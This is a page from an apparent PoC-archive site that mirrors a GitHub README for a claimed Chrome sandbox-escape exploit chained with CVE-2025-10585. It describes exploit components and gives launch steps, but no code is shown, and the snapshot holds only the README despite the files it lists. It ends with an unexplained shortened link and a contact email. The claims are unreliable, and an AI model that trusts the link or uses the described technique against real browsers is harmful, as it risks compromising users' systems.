Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-10585 PoC — Google Chrome 安全漏洞

Source
https://github.com/callinston/CVE-2025-10585
Associated Vulnerability
Title:Google Chrome 安全漏洞 (CVE-2025-10585)
Description:Type confusion in V8 in Google Chrome prior to 140.0.7339.185 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
Readme
# CVE-2025-10585

This repository provides a proof-of-concept for a sandbox escape vulnerability chained with CVE-2025-10585, a type confusion flaw in Chrome's V8 engine. The focus here is solely on the sandbox escape component, assuming prior RCE within the renderer process (e.g., via V8 exploitation). This PoC targets Chrome versions prior to 140.0.7339.185 on Windows, macOS, and Linux, demonstrating how to bypass the renderer sandbox to achieve native code execution on the host system. It leverages a kernel-level interaction flaw in the Mojo IPC system combined with a utility process escalation.

The escape chain exploits weaknesses in Chrome's multi-process architecture, specifically the communication between the renderer and browser processes. This allows elevation from the sandboxed renderer to unsandboxed privileges, enabling file system access, process injection, or persistence mechanisms.

## Key Files and Structure
- **README.md**: Comprehensive guide on setup, prerequisites.
- **sandbox_escape.js**: JavaScript module that, post-V8 RCE, crafts malicious Mojo messages to trigger the escape. It manipulates IPC bindings to impersonate a privileged process and request elevated capabilities.
- **mojo_exploit.cc**: C++ source for a custom Mojo binder that exploits a race condition in capability negotiation, leading to unauthorized access to broker services.
- **payload_injector.py**: Python script to compile and inject the payload into a running Chrome instance for testing.
- **sandbox_bypass.wasm**: WebAssembly module for creating a controlled memory buffer used in the IPC overflow during the escape.
- **test_server.js**: Node.js server to host a minimal HTML page that loads the escape script after assuming RCE is achieved.

## Usage
1. Build the C++ components: Use CMake to compile `mojo_exploit.cc` for your platform.
2. Run the test server: `node test_server.js`
3. Launch vulnerable Chrome with flags: `chrome --no-sandbox --disable-gpu --user-data-dir=/tmp` (for debugging; remove --no-sandbox in real tests).
4. Navigate to http://localhost:8080/escape.html and monitor for successful escape indicators.

## Disclaimer

This repository and its contents are provided for educational and research purposes only. The proof-of-concept code demonstrates a sandbox escape technique chained with CVE-2025-10585 in a controlled environment and should not be used for any malicious, illegal, or unauthorized activities. Exploitation of vulnerabilities without explicit permission is illegal and unethical.

The author disclaim any liability for misuse, damages, or consequences arising from the application of this code.

[href](https://tinyurl.com/mr29bwvw)

For any inquiries, please email me at: eviedejesu803@gmail.com
File Snapshot

 [4.0K]  /data/pocs/e51f6904832f4b1b3d54c5be5d9a16a3b3177750
└── [2.7K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →